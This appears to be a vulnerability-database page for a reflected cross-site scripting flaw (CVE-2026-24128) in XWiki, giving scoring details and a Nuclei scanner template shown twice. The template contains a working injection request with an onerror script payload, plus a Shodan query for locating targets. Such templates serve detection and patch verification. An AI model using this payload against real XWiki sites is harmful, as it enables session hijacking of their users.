XWiki Platform Distribution Flavor Main - Cross-Site Scripting

CVE-2026-24128

Verified

Description

XWiki Platform Distribution Flavor Main versions prior to 17.6.0 are vulnerable to reflected cross-site scripting (XSS) due to improper sanitization of user-supplied input in the extensionId parameter. An attacker can exploit this issue by injecting malicious JavaScript, which will be executed in the context of the victim's browser, potentially leading to session hijacking or other attacks.

Severity

Medium

CVSS Score

6.1

Exploit Probability

Affected Product

xwiki-platform-distribution-flavor-main

Published Date

January 28, 2026

Template Author

ritikchaddha

CVE-2026-24128.yaml

id: CVE-2026-24128

info:
  name: XWiki Platform Distribution Flavor Main - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki Platform Distribution Flavor Main versions prior to 17.6.0 are vulnerable to reflected cross-site scripting (XSS) due to improper sanitization of user-supplied input in the extensionId parameter. An attacker can exploit this issue by injecting malicious JavaScript, which will be executed in the context of the victim's browser, potentially leading to session hijacking or other attacks.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-23462
    - https://nvd.nist.gov/vuln/detail/CVE-2026-24128
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-24128
    epss-score: 0.00063
    epss-percentile: 0.1962
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    vendor: XWiki
    product: xwiki-platform-distribution-flavor-main
    shodan-query: html:"data-xwiki-reference"
  tags: cve,cve2026,xwiki,xss

http:
  - raw:
      - |
        GET /xwiki/bin/view/XWiki/Main?xpage=distribution&extensionSection=progress&extensionId=org.xwiki.platform%3Axwiki-platform-distribution-flavor-mainwikia7jdh%3Cimg%20src%3Da%20onerror%3Dalert(document.domain)%3Eh5kturc1hk&extensionVersion=17.6.0&extensionNamespace=wiki%3Axwiki&extensionAction=install HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=a onerror=alert(document.domain)>"
          - "xwiki.extension.job"
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c52e261d5609b34d0e6b37e3cc953fd4832f325d68c2c06255caf5d4c17e84e30220641783567f1bc14f4e1898ccfc2d255a5387674fff64fba8e91d4dec19247b82:922c64590222798bb761d5b6d8e72950

6.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE ID:

cve-2026-24128

CWE ID:

cwe-79

References

https://jira.xwiki.org/browse/XWIKI-23462 https://nvd.nist.gov/vuln/detail/CVE-2026-24128

Description

id: CVE-2026-24128

info:
  name: XWiki Platform Distribution Flavor Main - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki Platform Distribution Flavor Main versions prior to 17.6.0 are vulnerable to reflected cross-site scripting (XSS) due to improper sanitization of user-supplied input in the extensionId parameter. An attacker can exploit this issue by injecting malicious JavaScript, which will be executed in the context of the victim's browser, potentially leading to session hijacking or other attacks.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-23462
    - https://nvd.nist.gov/vuln/detail/CVE-2026-24128
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-24128
    epss-score: 0.00063
    epss-percentile: 0.1962
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    vendor: XWiki
    product: xwiki-platform-distribution-flavor-main
    shodan-query: html:"data-xwiki-reference"
  tags: cve,cve2026,xwiki,xss

http:
  - raw:
      - |
        GET /xwiki/bin/view/XWiki/Main?xpage=distribution&extensionSection=progress&extensionId=org.xwiki.platform%3Axwiki-platform-distribution-flavor-mainwikia7jdh%3Cimg%20src%3Da%20onerror%3Dalert(document.domain)%3Eh5kturc1hk&extensionVersion=17.6.0&extensionNamespace=wiki%3Axwiki&extensionAction=install HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=a onerror=alert(document.domain)>"
          - "xwiki.extension.job"
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c52e261d5609b34d0e6b37e3cc953fd4832f325d68c2c06255caf5d4c17e84e30220641783567f1bc14f4e1898ccfc2d255a5387674fff64fba8e91d4dec19247b82:922c64590222798bb761d5b6d8e72950

XWiki Platform Distribution Flavor Main - Cross-Site Scripting

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

XWiki Platform Distribution Flavor Main - Cross-Site Scripting

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References